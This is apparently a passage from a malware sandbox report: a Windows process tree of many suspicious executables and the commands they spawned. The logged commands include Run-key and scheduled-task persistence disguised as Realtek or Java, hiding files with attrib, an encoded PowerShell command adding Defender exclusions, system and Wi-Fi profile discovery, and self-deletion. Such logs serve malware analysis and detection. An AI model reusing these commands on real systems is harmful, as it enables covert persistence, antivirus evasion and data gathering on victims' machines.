        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3500 -childID 7 -isForBrowser -prefsHandle 3972 -prefMapHandle 6672 -prefsLen 28213 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a981e66-bae7-43a4-9a52-5e2660b6c53a} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" tab
        5⤵
        
        PID:6768
- C:\Users\Admin\Desktop\Files\MK.exe
  "C:\Users\Admin\Desktop\Files\MK.exe"
  2⤵
  PID:6888
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4568
- C:\Users\Admin\Desktop\Files\pyl64.exe
  "C:\Users\Admin\Desktop\Files\pyl64.exe"
  2⤵
  PID:3272
- C:\Users\Admin\Desktop\Files\ExtremeInjector.exe
  "C:\Users\Admin\Desktop\Files\ExtremeInjector.exe"
  2⤵
  PID:4336
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:3636
- C:\Users\Admin\Desktop\Files\OfferedBuilt.exe
  "C:\Users\Admin\Desktop\Files\OfferedBuilt.exe"
  2⤵
  PID:3440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Dominant Dominant.cmd & Dominant.cmd
    3⤵
    PID:4348
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3668
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:4392
- C:\Users\Admin\Desktop\Files\msedge.exe
  "C:\Users\Admin\Desktop\Files\msedge.exe"
  2⤵
  PID:4652
- C:\Users\Admin\Desktop\Files\newtpp.exe
  "C:\Users\Admin\Desktop\Files\newtpp.exe"
  2⤵
  PID:5724
- C:\Users\Admin\Desktop\Files\PURLOG.exe
  "C:\Users\Admin\Desktop\Files\PURLOG.exe"
  2⤵
  PID:7928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\Desktop\Files\PURLOG.exe' -Force
    3⤵
    PID:6492
- C:\Users\Admin\Desktop\Files\XClient_protected.exe
  "C:\Users\Admin\Desktop\Files\XClient_protected.exe"
  2⤵
  PID:4320
- C:\Users\Admin\Desktop\Files\Server.exe
  "C:\Users\Admin\Desktop\Files\Server.exe"
  2⤵
  PID:3284
- C:\Users\Admin\Desktop\Files\AsyncClient.exe
  "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
  2⤵
  PID:3336
- C:\Users\Admin\Desktop\Files\Prototype.exe
  "C:\Users\Admin\Desktop\Files\Prototype.exe"
  2⤵
  PID:1628
- C:\Users\Admin\Desktop\Files\06082025.exe
  "C:\Users\Admin\Desktop\Files\06082025.exe"
  2⤵
  PID:7228
- C:\Users\Admin\Desktop\Files\blackload.exe
  "C:\Users\Admin\Desktop\Files\blackload.exe"
  2⤵
  PID:4736
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    PID:9272
- C:\Users\Admin\Desktop\Files\build.exe
  "C:\Users\Admin\Desktop\Files\build.exe"
  2⤵
  PID:8628
- - C:\Windows\System32\Wbem\wmic.exe
    wmic /NAMESPACE:\\root\CIMV2 /NODE:'localhost' path Win32_VideoController get CurrentRefreshRate /FORMAT:rawxml
    3⤵
    PID:8924
- - C:\Users\Admin\AppData\Local\Temp\tmp-VgnI9s\pyth\pythonw.exe
    pythonw.exe Crypto\Util\astor.py
    3⤵
    PID:5416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:2116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:9884
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:8484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6224
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:6324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6320
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:6932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:7248
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:5412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:5036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:10176
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:9128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Realtek Audio""
      4⤵
      PID:10016
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Realtek Audio"
        5⤵
        Modifies registry key
        
        PID:6060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Realtek Audio" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Updater.exe" /f"
      4⤵
      PID:9940
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Realtek Audio" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Updater.exe" /f
        5⤵
        Modifies registry key
        
        PID:6344
  - - C:\Windows\SYSTEM32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Updater.exe"
      4⤵
      Views/modifies file attributes
      PID:8736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:9756
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1664
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3812
- C:\Users\Admin\Desktop\Files\9402.tmp.exe
  "C:\Users\Admin\Desktop\Files\9402.tmp.exe"
  2⤵
  PID:6256
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\43E6.tmp\43E7.tmp\43E8.bat C:\Users\Admin\Desktop\Files\9402.tmp.exe"
    3⤵
    PID:8548
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8800
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8616
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:2012
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9020
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8996
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9460
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5136
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5416
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7704
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:1032
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8204
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:10212
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4464
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4984
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3400
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8588
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4428
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:10024
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9456
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9656
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9480
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9596
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7316
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8576
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9556
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9648
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:10088
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7600
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9828
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3912
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:10016
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:700
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9900
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9800
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6292
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:2952
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8564
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8260
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9284
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7556
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7600
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7404
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9520
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:404
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8980
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7116
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8844
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9256
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7660
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8660
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9596
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7892
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9852
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7572
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4284
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7188
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4928
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9892
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9104
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3540
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8320
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9220
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5916
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9036
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6896
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8468
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:2908
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7264
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6968
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9152
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8504
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9688
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3052
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:10048
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7348
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8444
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5180
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4256
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8740
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7032
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7184
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8720
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9192
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9160
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6312
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3696
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7344
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4120
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:10116
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7676
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9608
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3488
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9440
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7400
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9464
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9800
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4428
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5688
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7428
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3468
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7116
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7580
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:480
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7292
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:10140
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8780
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6692
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8172
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8856
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8744
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9920
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:236
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7928
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3160
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4912
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5528
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9676
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5364
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9288
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:2420
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5156
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:2752
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6608
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6896
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8644
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8272
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9112
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3400
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8352
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5468
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7760
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7812
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7704
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7556
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:2364
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5060
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:1704
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7356
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3468
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4708
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4016
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5656
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:8664
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:2396
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6044
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6784
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7560
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6416
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:2952
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:3972
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5728
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:5808
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9552
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:6976
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:7680
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9920
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9236
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:1736
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:4912
  - - C:\Windows\system32\msg.exe
      msg * virus
      4⤵
      PID:9400
- C:\Users\Admin\Desktop\Files\Amadeus.exe
  "C:\Users\Admin\Desktop\Files\Amadeus.exe"
  2⤵
  PID:3648
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    PID:8876
- C:\Users\Admin\Desktop\Files\bwapp.exe
  "C:\Users\Admin\Desktop\Files\bwapp.exe"
  2⤵
  PID:8332
- C:\Users\Admin\Desktop\Files\Organiser.exe
  "C:\Users\Admin\Desktop\Files\Organiser.exe"
  2⤵
  PID:8728
- C:\Users\Admin\Desktop\Files\crypted.exe
  "C:\Users\Admin\Desktop\Files\crypted.exe"
  2⤵
  PID:4584
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:9300
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5408
- C:\Users\Admin\Desktop\Files\Accounts.exe
  "C:\Users\Admin\Desktop\Files\Accounts.exe"
  2⤵
  PID:8688
- C:\Users\Admin\Desktop\Files\Java32.exe
  "C:\Users\Admin\Desktop\Files\Java32.exe"
  2⤵
  PID:8908
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:9132
- - C:\Users\Admin\AppData\Roaming\Programfiles\java.exe
    "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe"
    3⤵
    PID:9144
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9248
- C:\Users\Admin\Desktop\Files\tdrpload.exe
  "C:\Users\Admin\Desktop\Files\tdrpload.exe"
  2⤵
  PID:4912
- C:\Users\Admin\Desktop\Files\octus.exe
  "C:\Users\Admin\Desktop\Files\octus.exe"
  2⤵
  PID:7172
- - C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe
    "C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe"
    3⤵
    PID:5820
  - - C:\Windows\SysWOW64\cmd.exe
      /c timeout 5 && del "C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe" && exit
      4⤵
      PID:9000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:1868
- C:\Users\Admin\Desktop\Files\Final.exe
  "C:\Users\Admin\Desktop\Files\Final.exe"
  2⤵
  PID:10088
- - C:\Users\Admin\AppData\Local\Temp\build.exe
    "C:\Users\Admin\AppData\Local\Temp\build.exe"
    3⤵
    PID:7572
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:7676
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:7036
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:8856
    - - C:\Windows\system32\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        5⤵
        
        PID:6864
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      4⤵
      PID:5016
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:3584
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        
        PID:9836
    - - C:\Windows\system32\findstr.exe
        
        findstr "SSID BSSID Signal"
        5⤵
        
        PID:7372
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe"
      4⤵
      PID:9248
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:6068
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 3
        5⤵
        Delays execution with timeout.exe
        
        PID:9816
- C:\Users\Admin\Desktop\Files\keygen.exe
  "C:\Users\Admin\Desktop\Files\keygen.exe"
  2⤵
  PID:9860
- C:\Users\Admin\Desktop\Files\solandra.exe
  "C:\Users\Admin\Desktop\Files\solandra.exe"
  2⤵
  PID:9412
- C:\Users\Admin\Desktop\Files\msf.exe
  "C:\Users\Admin\Desktop\Files\msf.exe"
  2⤵
  PID:5960
- C:\Users\Admin\Desktop\Files\4434.exe
  "C:\Users\Admin\Desktop\Files\4434.exe"
  2⤵
  PID:8752
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:8208
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7232
- C:\Users\Admin\Desktop\Files\https.exe
  "C:\Users\Admin\Desktop\Files\https.exe"
  2⤵
  PID:4468
- C:\Users\Admin\Desktop\Files\Opdxdyeul.exe
  "C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"
  2⤵
  PID:10136
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAHAAZAB4AGQAeQBlAHUAbAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwARABlAHMAawB0AG8AcABcAEYAaQBsAGUAcwBcAE8AcABkAHgAZAB5AGUAdQBsAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWQBqAGwAdwB1AHUAeQBzAC4AZQB4AGUA
    3⤵
    PID:10088
- - C:\Users\Admin\Desktop\Files\Opdxdyeul.exe
    "C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"
    3⤵
    PID:9456
- C:\Users\Admin\Desktop\Files\CleanerV2.exe
  "C:\Users\Admin\Desktop\Files\CleanerV2.exe"
  2⤵
  PID:9028
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3872
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    PID:10152
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6280
- C:\Users\Admin\Desktop\Files\j4vzzuai.exe
  "C:\Users\Admin\Desktop\Files\j4vzzuai.exe"
  2⤵
  PID:8
- - C:\Users\Admin\Desktop\Files\j4vzzuai.exe
    "C:\Users\Admin\Desktop\Files\j4vzzuai.exe"
    3⤵
    PID:10064
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 304
    3⤵
    - Program crash
    PID:9556
